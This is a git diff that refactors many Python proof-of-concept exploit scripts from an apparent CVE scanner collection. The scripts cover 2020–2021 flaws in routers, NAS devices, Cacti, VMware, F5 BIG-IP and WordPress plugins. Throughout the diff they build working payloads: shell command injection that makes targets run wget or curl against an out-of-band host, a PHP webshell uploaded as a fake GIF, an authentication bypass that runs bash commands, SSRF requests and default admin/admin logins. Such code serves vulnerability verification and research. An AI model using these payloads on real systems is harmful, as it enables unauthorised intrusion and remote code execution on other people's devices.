         resp0 = requests.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False)
 
-        path = """/cgi-bin/system_mgr.cgi?C1=ON&cmd=cgi_ntp_time&f_ntp_server=`wget http://oob_domain`"""
+        path = """/cgi-bin/system_mgr.cgi?C1=ON&cmd=cgi_ntp_time&f_ntp_server=`wget http://{oob_domain}`""".format(oob_domain=oob_domain)
         method = "POST"
         data = """"""
         headers = {'Accept': '*/*'}
diff --git a/2020/CVE-2020-26413/poc/pocsploit/CVE-2020-26413.py b/2020/CVE-2020-26413/poc/pocsploit/CVE-2020-26413.py
index ec73348dc..9a83ac6dd 100644
--- a/2020/CVE-2020-26413/poc/pocsploit/CVE-2020-26413.py
+++ b/2020/CVE-2020-26413/poc/pocsploit/CVE-2020-26413.py
@@ -39,13 +39,13 @@ def poc(url):
 
         path = """/api/graphql"""
         method = "POST"
-        data = """{
-  "query": "{\nusers {\nedges {\n  node {\n    username\n    email\n    avatarUrl\n    status {\n      emoji\n      message\n      messageHtml\n     }\n    }\n   }\n  }\n }",
-  "variables": null,
-  "operationName": null
-}"""
+        data = {
+            "query": "{\nusers {\nedges {\n  node {\n    username\n    email\n    avatarUrl\n    status {\n      emoji\n      message\n      messageHtml\n     }\n    }\n   }\n  }\n }",
+            "variables": None,
+            "operationName": None
+        }
         headers = {'Content-Type': 'application/json'}
-        resp0 = requests.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False)
+        resp0 = requests.request(method=method,url=url+path,json=data,headers=headers,timeout=10,verify=False,allow_redirects=False)
 
         if ("""username":""" in resp0.text and """avatarUrl":""" in resp0.text and """node":""" in resp0.text) and (resp0.status_code == 200):
             result["success"] = True
diff --git a/2020/CVE-2020-26919/poc/pocsploit/CVE-2020-26919.py b/2020/CVE-2020-26919/poc/pocsploit/CVE-2020-26919.py
index 62d740338..a2701325f 100644
--- a/2020/CVE-2020-26919/poc/pocsploit/CVE-2020-26919.py
+++ b/2020/CVE-2020-26919/poc/pocsploit/CVE-2020-26919.py
@@ -42,7 +42,7 @@ def poc(url):
 
         path = """/login.htm"""
         method = "POST"
-        data = """submitId=debug&debugCmd=wget+http://oob_domain&submitEnd="""
+        data = """submitId=debug&debugCmd=wget+http://{oob_domain}&submitEnd=""".format(oob_domain=oob_domain)
         headers = {'Accept': '*/*'}
         resp0 = requests.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False)
 
diff --git a/2020/CVE-2020-28188/poc/pocsploit/CVE-2020-28188.py b/2020/CVE-2020-28188/poc/pocsploit/CVE-2020-28188.py
index 6d2a0b00f..4a90c3a81 100644
--- a/2020/CVE-2020-28188/poc/pocsploit/CVE-2020-28188.py
+++ b/2020/CVE-2020-28188/poc/pocsploit/CVE-2020-28188.py
@@ -41,13 +41,13 @@ def poc(url):
 
         oob_domain,flag = gen_oob_domain()
 
-        path = """/include/makecvs.php?Event=%60wget%20http%3A%2F%2Foob_domain%60"""
+        path = """/include/makecvs.php?Event=%60wget%20http%3A%2F%2F{oob_domain}%60""".format(oob_domain=oob_domain)
         method = "GET"
         data = """"""
         headers = {}
         resp0 = requests.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False)
 
-        path = """/tos/index.php?explorer/pathList&path=%60wget%20http%3A%2F%2Foob_domain%60"""
+        path = """/tos/index.php?explorer/pathList&path=%60wget%20http%3A%2F%2F{oob_domain}%60""".format(oob_domain=oob_domain)
         method = "GET"
         data = """"""
         headers = {}
diff --git a/2020/CVE-2020-28871/poc/pocsploit/CVE-2020-28871.py b/2020/CVE-2020-28871/poc/pocsploit/CVE-2020-28871.py
index 55407892d..1ade73287 100644
--- a/2020/CVE-2020-28871/poc/pocsploit/CVE-2020-28871.py
+++ b/2020/CVE-2020-28871/poc/pocsploit/CVE-2020-28871.py
@@ -1,4 +1,6 @@
 import requests
+import random
+import string
 from plugins.oob import verify_request, gen_oob_domain
 
 
@@ -36,6 +38,7 @@ def fingerprint(url):
 # Proof of Concept
 def poc(url):
     result = {}
+    randstr = gen_randstr(10)
     try:
         url = format_url(url)
 
@@ -44,16 +47,16 @@ def poc(url):
         path = """/assets/php/upload.php"""
         method = "POST"
         data = """-----------------------------31046105003900160576454225745
-Content-Disposition: form-data; name="fileToUpload"; filename="{{randstr}}.php"
+Content-Disposition: form-data; name="fileToUpload"; filename="{randstr}.php"
 Content-Type: image/gif
 
-GIF89a213213123<?php shell_exec("wget -c http://oob_domain");
+GIF89a213213123<?php shell_exec("wget -c http://{oob_domain}");
 
------------------------------31046105003900160576454225745--"""
+-----------------------------31046105003900160576454225745--""".format(oob_domain=oob_domain, randstr=randstr)
         headers = {'Accept-Encoding': 'gzip, deflate', 'Accept': 'text/plain, */*; q=0.01', 'Connection': 'close', 'Accept-Language': 'en-US,en;q=0.5', 'X-Requested-With': 'XMLHttpRequest', 'Content-Type': 'multipart/form-data; boundary=---------------------------31046105003900160576454225745', 'Origin': 'http://{{Hostname}}', 'Referer': 'http://{{Hostname}}'}
         resp0 = requests.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False)
 
-        path = """/assets/data/usrimg/{{tolower("{{randstr}}.php")}}"""
+        path = """/assets/data/usrimg/{}.php""".format(randstr.lower())
         method = "GET"
         data = """"""
         headers = {}
@@ -82,4 +85,7 @@ def format_url(url):
         url = 'http://' + url
     url = url.rstrip('/')
 
-    return url
\ No newline at end of file
+    return url
+
+def gen_randstr(length):
+    return ''.join(random.choice(string.ascii_letters + string.digits) for _ in range(length))
\ No newline at end of file
diff --git a/2020/CVE-2020-35713/poc/pocsploit/CVE-2020-35713.py b/2020/CVE-2020-35713/poc/pocsploit/CVE-2020-35713.py
index 25ac23e74..6134e841c 100644
--- a/2020/CVE-2020-35713/poc/pocsploit/CVE-2020-35713.py
+++ b/2020/CVE-2020-35713/poc/pocsploit/CVE-2020-35713.py
@@ -41,7 +41,7 @@ def poc(url):
 
         path = """/goform/setSysAdm"""
         method = "POST"
-        data = """admuser=admin&admpass=;wget http://oob_domain;&admpasshint=61646D696E=&AuthTimeout=600&wirelessMgmt_http=1"""
+        data = """admuser=admin&admpass=;wget http://{oob_domain};&admpasshint=61646D696E=&AuthTimeout=600&wirelessMgmt_http=1""".format(oob_domain=oob_domain)
         headers = {'Accept': '*/*'}
         resp0 = requests.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False)
 
diff --git a/2020/CVE-2020-35749/poc/pocsploit/CVE-2020-35749.py b/2020/CVE-2020-35749/poc/pocsploit/CVE-2020-35749.py
index e1b6dc46c..4aa6ab6a4 100644
--- a/2020/CVE-2020-35749/poc/pocsploit/CVE-2020-35749.py
+++ b/2020/CVE-2020-35749/poc/pocsploit/CVE-2020-35749.py
@@ -1,4 +1,5 @@
 import requests
+import re
 
 
 # Vuln Base Info
@@ -33,6 +34,8 @@ def fingerprint(url):
 # Proof of Concept
 def poc(url):
     result = {}
+    username = "admin"
+    password = "admin"
     try:
         url = format_url(url)
 
@@ -40,7 +43,7 @@ def poc(url):
 
         path = """/wp-login.php"""
         method = "POST"
-        data = """log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1"""
+        data = """log={username}&pwd={password}&wp-submit=Log+In&testcookie=1""".format(username=username, password=password)
         headers = {'Content-Type': 'application/x-www-form-urlencoded', 'Cookie': 'wordpress_test_cookie=WP%20Cookie%20check'}
         resp0 = s.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False)
 
diff --git a/2020/CVE-2020-7136/poc/pocsploit/CVE-2020-7136.py b/2020/CVE-2020-7136/poc/pocsploit/CVE-2020-7136.py
index 549c5ce63..f559254c1 100644
--- a/2020/CVE-2020-7136/poc/pocsploit/CVE-2020-7136.py
+++ b/2020/CVE-2020-7136/poc/pocsploit/CVE-2020-7136.py
@@ -39,15 +39,14 @@ def poc(url):
 
         path = """/session/create"""
         method = "POST"
-        data = """{"hapi":{"username":"Administrator","password":"any_password","language":"en","mode":"gui", "usesshkey":true, "privatekey":"any_privateky", "passphrase":"any_passphase","settings":{"output_filter":"passed","port_number":"444"}}}"""
+        data = {"hapi":{"username":"Administrator","password":"any_password","language":"en","mode":"gui", "usesshkey":true, "privatekey":"any_privateky", "passphrase":"any_passphase","settings":{"output_filter":"passed","port_number":"444"}}}
         headers = {'Accept': '*/*', 'Content-Type': 'application/json'}
-        resp0 = requests.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False)
+        resp0 = requests.request(method=method,url=url+path,json=data,headers=headers,timeout=10,verify=False,allow_redirects=False)
 
         path = """/session/{{sessionid}}/node/index"""
         method = "GET"
-        data = """"""
         headers = {}
-        resp1 = requests.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False)
+        resp1 = requests.request(method=method,url=url+path,headers=headers,timeout=10,verify=False,allow_redirects=False)
 
         if ("""hmessage""" in resp1.text and """Command completed successfully.""" in resp1.text and """node_name""" in resp1.text):
             result["success"] = True
diff --git a/2020/CVE-2020-8813/poc/pocsploit/CVE-2020-8813.py b/2020/CVE-2020-8813/poc/pocsploit/CVE-2020-8813.py
index 347e6d300..c2129775b 100644
--- a/2020/CVE-2020-8813/poc/pocsploit/CVE-2020-8813.py
+++ b/2020/CVE-2020-8813/poc/pocsploit/CVE-2020-8813.py
@@ -42,7 +42,7 @@ def poc(url):
         path = """/graph_realtime.php?action=init"""
         method = "GET"
         data = """"""
-        headers = {'Cookie': 'Cacti=%3Bwget%20http%3A//oob_domain'}
+        headers = {'Cookie': 'Cacti=%3Bwget%20http%3A//{oob_domain}'.format(oob_domain=oob_domain)}
         resp0 = requests.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False)
 
         if verify_request(type="dns", flag=flag):
diff --git a/2021/CVE-2021-1498/poc/pocsploit/CVE-2021-1498.py b/2021/CVE-2021-1498/poc/pocsploit/CVE-2021-1498.py
index 1f09175d1..730ec027b 100644
--- a/2021/CVE-2021-1498/poc/pocsploit/CVE-2021-1498.py
+++ b/2021/CVE-2021-1498/poc/pocsploit/CVE-2021-1498.py
@@ -47,7 +47,7 @@ def poc(url):
 
         path = """/storfs-asup"""
         method = "POST"
-        data = """action=&token=`wget http://oob_domain`&mode=`wget http://oob_domain`"""
+        data = """action=&token=`wget http://{oob_domain}`&mode=`wget http://{oob_domain}`""".format(oob_domain=oob_domain)
         headers = {'Accept': '*/*', 'Content-Type': 'application/x-www-form-urlencoded'}
         resp0 = requests.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False)
 
diff --git a/2021/CVE-2021-20038/poc/pocsploit/CVE-2021-20038.py b/2021/CVE-2021-20038/poc/pocsploit/CVE-2021-20038.py
index f756588d9..f44be44ef 100644
--- a/2021/CVE-2021-20038/poc/pocsploit/CVE-2021-20038.py
+++ b/2021/CVE-2021-20038/poc/pocsploit/CVE-2021-20038.py
@@ -45,7 +45,7 @@ def poc(url):
 
         oob_domain,flag = gen_oob_domain()
 
-        path = """/{{prefix_addr}}{{system_addr}};{wget,http://oob_domain};{{prefix_addr}}{{system_addr}};{wget,http://oob_domain};?{{repeat("A", 518)}}"""
+        path = """/{{prefix_addr}}{{system_addr}};{wget,http://%s};{{prefix_addr}}{{system_addr}};{wget,http://%s};?{{repeat("A", 518)}}""" % (oob_domain,oob_domain)
         method = "GET"
         data = """"""
         headers = {}
diff --git a/2021/CVE-2021-20167/poc/pocsploit/CVE-2021-20167.py b/2021/CVE-2021-20167/poc/pocsploit/CVE-2021-20167.py
index 54b392114..7c322eb42 100644
--- a/2021/CVE-2021-20167/poc/pocsploit/CVE-2021-20167.py
+++ b/2021/CVE-2021-20167/poc/pocsploit/CVE-2021-20167.py
@@ -43,8 +43,8 @@ def poc(url):
 
         path = """/cgi-bin/readycloud_control.cgi?1111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111/api/users"""
         method = "POST"
-        data = '''"name":"';$(curl http://oob_domain);'",
-"email":"a@b.c"'''
+        data = '''"name":"';$(curl http://{oob_domain});'",
+"email":"a@b.c"'''.format(oob_domain=oob_domain)
         headers = {}
         resp0 = requests.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False)
 
diff --git a/2021/CVE-2021-20792/poc/pocsploit/CVE-2021-20792.py b/2021/CVE-2021-20792/poc/pocsploit/CVE-2021-20792.py
index 79f04622f..615c47a30 100644
--- a/2021/CVE-2021-20792/poc/pocsploit/CVE-2021-20792.py
+++ b/2021/CVE-2021-20792/poc/pocsploit/CVE-2021-20792.py
@@ -33,6 +33,8 @@ def fingerprint(url):
 # Proof of Concept
 def poc(url):
     result = {}
+    username = "admin"
+    password = "admin"
     try:
         url = format_url(url)
 
@@ -40,7 +42,7 @@ def poc(url):
 
         path = """/wp-login.php"""
         method = "POST"
-        data = """log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1"""
+        data = """log={username}&pwd={password}&wp-submit=Log+In&testcookie=1""".format(username=username, password=password)
         headers = {'Content-Type': 'application/x-www-form-urlencoded', 'Cookie': 'wordpress_test_cookie=WP%20Cookie%20check'}
         resp0 = s.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False)
 
diff --git a/2021/CVE-2021-20837/poc/pocsploit/CVE-2021-20837.py b/2021/CVE-2021-20837/poc/pocsploit/CVE-2021-20837.py
index 06203bbd4..ae819fd73 100644
--- a/2021/CVE-2021-20837/poc/pocsploit/CVE-2021-20837.py
+++ b/2021/CVE-2021-20837/poc/pocsploit/CVE-2021-20837.py
@@ -51,12 +51,12 @@ def poc(url):
     <param>
       <value>
         <base64>
-          {{base64("`wget http://oob_domain`")}}
+          {{base64("`wget http://%s`")}}
         </base64>
       </value>
     </param>
   </params>
-</methodCall>"""
+</methodCall>""" % oob_domain
         headers = {'Content-Type': 'text/xml'}
         resp0 = requests.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False)
 
diff --git a/2021/CVE-2021-21287/poc/pocsploit/CVE-2021-21287.py b/2021/CVE-2021-21287/poc/pocsploit/CVE-2021-21287.py
index e297d8cc5..474a60412 100644
--- a/2021/CVE-2021-21287/poc/pocsploit/CVE-2021-21287.py
+++ b/2021/CVE-2021-21287/poc/pocsploit/CVE-2021-21287.py
@@ -43,9 +43,9 @@ def poc(url):
 
         path = """/minio/webrpc"""
         method = "POST"
-        data = """{"id":1,"jsonrpc":"2.0","params":{"token":  "Test"},"method":"web.LoginSTS"}"""
+        data = {"id":1,"jsonrpc":"2.0","params":{"token":  "Test"},"method":"web.LoginSTS"}
         headers = {'Content-Type': 'application/json', 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36', 'Content-Length': '76'}
-        resp0 = requests.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False)
+        resp0 = requests.request(method=method,url=url+path,json=data,headers=headers,timeout=10,verify=False,allow_redirects=False)
 
         if verify_request(type="dns", flag=flag):
             result["success"] = True
diff --git a/2021/CVE-2021-21973/poc/pocsploit/CVE-2021-21973.py b/2021/CVE-2021-21973/poc/pocsploit/CVE-2021-21973.py
index f5cc39926..d57a1ffd2 100644
--- a/2021/CVE-2021-21973/poc/pocsploit/CVE-2021-21973.py
+++ b/2021/CVE-2021-21973/poc/pocsploit/CVE-2021-21973.py
@@ -1,4 +1,6 @@
 import requests
+import random
+import string
 from plugins.oob import verify_request, gen_oob_domain
 
 
@@ -36,6 +38,7 @@ def fingerprint(url):
 # Proof of Concept
 def poc(url):
     result = {}
+    randstr = gen_randstr(6)
     try:
         url = format_url(url)
 
@@ -44,7 +47,7 @@ def poc(url):
         path = """/ui/vropspluginui/rest/services/getvcdetails"""
         method = "GET"
         data = """"""
-        headers = {'Vcip': 'oob_domain', 'Vcpassword': '{{rand_base(6)}}', 'Vcusername': '{{rand_base(6)}}', 'Reqresource': '{{rand_base(6)}}'}
+        headers = {'Vcip': oob_domain, 'Vcpassword': randstr, 'Vcusername': randstr, 'Reqresource': randstr}
         resp0 = requests.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False)
 
         if verify_request(type="dns", flag=flag):
@@ -70,4 +73,7 @@ def format_url(url):
         url = 'http://' + url
     url = url.rstrip('/')
 
-    return url
\ No newline at end of file
+    return url
+
+def gen_randstr(length):
+    return ''.join(random.choice(string.ascii_letters) for _ in range(length))
\ No newline at end of file
diff --git a/2021/CVE-2021-21985/poc/pocsploit/CVE-2021-21985.py b/2021/CVE-2021-21985/poc/pocsploit/CVE-2021-21985.py
index 2b504d2fb..0942a4ff6 100644
--- a/2021/CVE-2021-21985/poc/pocsploit/CVE-2021-21985.py
+++ b/2021/CVE-2021-21985/poc/pocsploit/CVE-2021-21985.py
@@ -39,9 +39,9 @@ def poc(url):
 
         path = """/ui/h5-vsan/rest/proxy/service/com.vmware.vsan.client.services.capability.VsanCapabilityProvider/getClusterCapabilityData"""
         method = "POST"
-        data = """{"methodInput":[{"type":"ClusterComputeResource","value": null,"serverGuid": null}]}"""
+        data = {"methodInput":[{"type":"ClusterComputeResource","value": None,"serverGuid": None}]}
         headers = {'Accept': '*/*', 'Content-Type': 'application/json'}
-        resp0 = requests.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False)
+        resp0 = requests.request(method=method,url=url+path,json=data,headers=headers,timeout=10,verify=False,allow_redirects=False)
 
         if ("""{"result":{"isDisconnected":""" in resp0.text):
             result["success"] = True
diff --git a/2021/CVE-2021-22005/poc/pocsploit/CVE-2021-22005.py b/2021/CVE-2021-22005/poc/pocsploit/CVE-2021-22005.py
index 2c699942f..bd214f9e0 100644
--- a/2021/CVE-2021-22005/poc/pocsploit/CVE-2021-22005.py
+++ b/2021/CVE-2021-22005/poc/pocsploit/CVE-2021-22005.py
@@ -39,9 +39,8 @@ def poc(url):
 
         path = """/"""
         method = "GET"
-        data = """"""
         headers = {}
-        resp0 = requests.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False)
+        resp0 = requests.request(method=method,url=url+path,headers=headers,timeout=10,verify=False,allow_redirects=False)
 
         path = """/analytics/telemetry/ph/api/hyper/send?_c&_i=test"""
         method = "POST"
diff --git a/2021/CVE-2021-22986/poc/pocsploit/CVE-2021-22986.py b/2021/CVE-2021-22986/poc/pocsploit/CVE-2021-22986.py
index 9c149eff3..513773218 100644
--- a/2021/CVE-2021-22986/poc/pocsploit/CVE-2021-22986.py
+++ b/2021/CVE-2021-22986/poc/pocsploit/CVE-2021-22986.py
@@ -38,15 +38,15 @@ def poc(url):
 
         path = """/mgmt/shared/authn/login"""
         method = "POST"
-        data = """{"username":"admin","userReference":{},"loginReference":{"link":"http://localhost/mgmt/shared/gossip"}}"""
+        data = {"username":"admin","userReference":{},"loginReference":{"link":"http://localhost/mgmt/shared/gossip"}}
         headers = {'Accept-Language': 'en', 'Authorization': 'Basic YWRtaW46', 'Content-Type': 'application/json', 'Cookie': 'BIGIPAuthCookie=1234', 'Connection': 'close'}
-        resp0 = requests.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False)
+        resp0 = requests.request(method=method,url=url+path,json=data,headers=headers,timeout=10,verify=False,allow_redirects=False)
 
         path = """/mgmt/tm/util/bash"""
         method = "POST"
-        data = """{"command":"run","utilCmdArgs":"-c id"}"""
+        data = {"command":"run","utilCmdArgs":"-c id"}
         headers = {'Accept-Language': 'en', 'X-F5-Auth-Token': '§token§', 'Content-Type': 'application/json', 'Connection': 'close'}
-        resp1 = requests.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False)
+        resp1 = requests.request(method=method,url=url+path,json=data,headers=headers,timeout=10,verify=False,allow_redirects=False)
 
         if ("""commandResult""" in resp1.text and """uid=""" in resp1.text):
             result["success"] = True
diff --git a/2021/CVE-2021-24300/poc/pocsploit/CVE-2021-24300.py b/2021/CVE-2021-24300/poc/pocsploit/CVE-2021-24300.py
index 342e5e265..51e709cf2 100644
--- a/2021/CVE-2021-24300/poc/pocsploit/CVE-2021-24300.py
+++ b/2021/CVE-2021-24300/poc/pocsploit/CVE-2021-24300.py
@@ -33,6 +33,8 @@ def fingerprint(url):
 # Proof of Concept
 def poc(url):
     result = {}
+    username = "admin"
+    password = "admin"
     try:
         url = format_url(url)
 
@@ -40,7 +42,7 @@ def poc(url):
 
         path = """/wp-login.php"""
         method = "POST"
-        data = """log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1"""
+        data = """log={username}&pwd={password}&wp-submit=Log+In&testcookie=1""".format(username=username, password=password)
         headers = {'Content-Type': 'application/x-www-form-urlencoded', 'Cookie': 'wordpress_test_cookie=WP%20Cookie%20check'}
         resp0 = s.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False)
 
diff --git a/2021/CVE-2021-24472/poc/pocsploit/CVE-2021-24472.py b/2021/CVE-2021-24472/poc/pocsploit/CVE-2021-24472.py
index bcfafd7b0..2cf03e4d9 100644
--- a/2021/CVE-2021-24472/poc/pocsploit/CVE-2021-24472.py
+++ b/2021/CVE-2021-24472/poc/pocsploit/CVE-2021-24472.py
@@ -39,7 +39,7 @@ def poc(url):
 
         oob_domain,flag = gen_oob_domain()
 
-        path = """/?qtproxycall=http://oob_domain"""
+        path = """/?qtproxycall=http://{oob_domain}""".format(oob_domain=oob_domain)
         method = "GET"
         data = """"""
         headers = {}
diff --git a/2021/CVE-2021-24488/poc/pocsploit/CVE-2021-24488.py b/2021/CVE-2021-24488/poc/pocsploit/CVE-2021-24488.py
index da46a2c51..8247dcd22 100644
--- a/2021/CVE-2021-24488/poc/pocsploit/CVE-2021-24488.py
+++ b/2021/CVE-2021-24488/poc/pocsploit/CVE-2021-24488.py
@@ -33,6 +33,8 @@ def fingerprint(url):
 # Proof of Concept
 def poc(url):
     result = {}
+    username = "admin"
+    password = "admin"
     try:
         url = format_url(url)
 
@@ -40,7 +42,7 @@ def poc(url):
 
         path = """/wp-login.php"""
         method = "POST"
-        data = """log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1"""
+        data = """log={username}&pwd={password}&wp-submit=Log+In&testcookie=1""".format(username=username, password=password)
         headers = {'Content-Type': 'application/x-www-form-urlencoded', 'Cookie': 'wordpress_test_cookie=WP%20Cookie%20check'}
         resp0 = s.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False)
 
diff --git a/2021/CVE-2021-24510/poc/pocsploit/CVE-2021-24510.py b/2021/CVE-2021-24510/poc/pocsploit/CVE-2021-24510.py
index ef20eb3cf..ce567522b 100644
--- a/2021/CVE-2021-24510/poc/pocsploit/CVE-2021-24510.py
+++ b/2021/CVE-2021-24510/poc/pocsploit/CVE-2021-24510.py
@@ -33,6 +33,8 @@ def fingerprint(url):
 # Proof of Concept
 def poc(url):
     result = {}
+    username = "admin"
+    password = "admin"
     try:
         url = format_url(url)
 
@@ -40,7 +42,7 @@ def poc(url):
 
         path = """/wp-login.php"""
         method = "POST"
-        data = """log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1"""
+        data = """log={username}&pwd={password}&wp-submit=Log+In&testcookie=1""".format(username=username, password=password)
         headers = {'Content-Type': 'application/x-www-form-urlencoded', 'Cookie': 'wordpress_test_cookie=WP%20Cookie%20check'}
         resp0 = s.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False)
 
diff --git a/2021/CVE-2021-24926/poc/pocsploit/CVE-2021-24926.py b/2021/CVE-2021-24926/poc/pocsploit/CVE-2021-24926.py
index f148d3f05..7647d25f7 100644
--- a/2021/CVE-2021-24926/poc/pocsploit/CVE-2021-24926.py
+++ b/2021/CVE-2021-24926/poc/pocsploit/CVE-2021-24926.py
@@ -33,6 +33,8 @@ def fingerprint(url):
 # Proof of Concept
 def poc(url):
     result = {}
+    username = "admin"
+    password = "admin"
     try:
         url = format_url(url)
 
@@ -40,7 +42,7 @@ def poc(url):
 
         path = """/wp-login.php"""
         method = "POST"
-        data = """log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1"""
+        data = """log={username}&pwd={password}&wp-submit=Log+In&testcookie=1""".format(username=username, password=password)
         headers = {'Content-Type': 'application/x-www-form-urlencoded', 'Cookie': 'wordpress_test_cookie=WP%20Cookie%20check'}
         resp0 = s.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False)
 
diff --git a/2021/CVE-2021-24947/poc/pocsploit/CVE-2021-24947.py b/2021/CVE-2021-24947/poc/pocsploit/CVE-2021-24947.py
index 7f3f97cd4..ce922e4fd 100644
--- a/2021/CVE-2021-24947/poc/pocsploit/CVE-2021-24947.py
+++ b/2021/CVE-2021-24947/poc/pocsploit/CVE-2021-24947.py
@@ -33,6 +33,8 @@ def fingerprint(url):
 # Proof of Concept
 def poc(url):
     result = {}
+    username = "admin"
+    password = "admin"
     try:
         url = format_url(url)
 
@@ -40,7 +42,7 @@ def poc(url):
 
         path = """/wp-login.php"""
         method = "POST"
-        data = """log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1"""
+        data = """log={username}&pwd={password}&wp-submit=Log+In&testcookie=1""".format(username=username, password=password)
         headers = {'Content-Type': 'application/x-www-form-urlencoded', 'Cookie': 'wordpress_test_cookie=WP%20Cookie%20check'}
         resp0 = s.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False)
 
diff --git a/2021/CVE-2021-24991/poc/pocsploit/CVE-2021-24991.py b/2021/CVE-2021-24991/poc/pocsploit/CVE-2021-24991.py
index d882f807b..2a3dcebc7 100644
--- a/2021/CVE-2021-24991/poc/pocsploit/CVE-2021-24991.py
+++ b/2021/CVE-2021-24991/poc/pocsploit/CVE-2021-24991.py
@@ -33,6 +33,8 @@ def fingerprint(url):
 # Proof of Concept
 def poc(url):
     result = {}
+    username = "admin"
+    password = "admin"
     try:
         url = format_url(url)
 
@@ -40,7 +42,7 @@ def poc(url):
 
         path = """/wp-login.php"""
         method = "POST"
-        data = """log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1"""
+        data = """log={username}&pwd={password}&wp-submit=Log+In&testcookie=1""".format(username=username, password=password)
         headers = {'Content-Type': 'application/x-www-form-urlencoded', 'Cookie': 'wordpress_test_cookie=WP%20Cookie%20check'}
         resp0 = s.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False)
 
diff --git a/2021/CVE-2021-25008/poc/pocsploit/CVE-2021-25008.py b/2021/CVE-2021-25008/poc/pocsploit/CVE-2021-25008.py
index 5071ed997..318f592c6 100644
--- a/2021/CVE-2021-25008/poc/pocsploit/CVE-2021-25008.py
+++ b/2021/CVE-2021-25008/poc/pocsploit/CVE-2021-25008.py
@@ -33,6 +33,8 @@ def fingerprint(url):
 # Proof of Concept
 def poc(url):
     result = {}
+    username = "admin"
+    password = "admin"
     try:
         url = format_url(url)
 
@@ -40,7 +42,7 @@ def poc(url):
 
         path = """/wp-login.php"""
         method = "POST"
-        data = """log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1"""
+        data = """log={username}&pwd={password}&wp-submit=Log+In&testcookie=1""".format(username=username, password=password)
         headers = {'Content-Type': 'application/x-www-form-urlencoded', 'Cookie': 'wordpress_test_cookie=WP%20Cookie%20check'}
         resp0 = s.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False)
 
diff --git a/2021/CVE-2021-25052/poc/pocsploit/CVE-2021-25052.py b/2021/CVE-2021-25052/poc/pocsploit/CVE-2021-25052.py
index 8e33335f9..2cbf1369b 100644
--- a/2021/CVE-2021-25052/poc/pocsploit/CVE-2021-25052.py
+++ b/2021/CVE-2021-25052/poc/pocsploit/CVE-2021-25052.py
@@ -35,6 +35,8 @@ def fingerprint(url):
 # Proof of Concept
 def poc(url):
     result = {}
+    username = "admin"
+    password = "admin"
     try:
         url = format_url(url)
 
@@ -44,11 +46,11 @@ def poc(url):
 
         path = """/wp-login.php"""
         method = "POST"
-        data = """log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1"""
+        data = """log={username}&pwd={password}&wp-submit=Log+In&testcookie=1""".format(username=username, password=password)
         headers = {'Content-Type': 'application/x-www-form-urlencoded', 'Cookie': 'wordpress_test_cookie=WP%20Cookie%20check'}
         resp0 = s.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False)
 
-        path = """/wp-admin/admin.php?page=wow-company&tab=http://oob_domain/"""
+        path = """/wp-admin/admin.php?page=wow-company&tab=http://{oob_domain}/""".format(oob_domain=oob_domain)
         method = "GET"
         data = """"""
         headers = {}
diff --git a/2021/CVE-2021-25063/poc/pocsploit/CVE-2021-25063.py b/2021/CVE-2021-25063/poc/pocsploit/CVE-2021-25063.py
index a578982e0..3c6f0600d 100644
--- a/2021/CVE-2021-25063/poc/pocsploit/CVE-2021-25063.py
+++ b/2021/CVE-2021-25063/poc/pocsploit/CVE-2021-25063.py
@@ -32,6 +32,8 @@ def fingerprint(url):
 # Proof of Concept
 def poc(url):
     result = {}
+    username = "admin"
+    password = "admin"
     try:
         url = format_url(url)
 
@@ -39,7 +41,7 @@ def poc(url):
 
         path = """/wp-login.php"""
         method = "POST"
-        data = """log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1"""
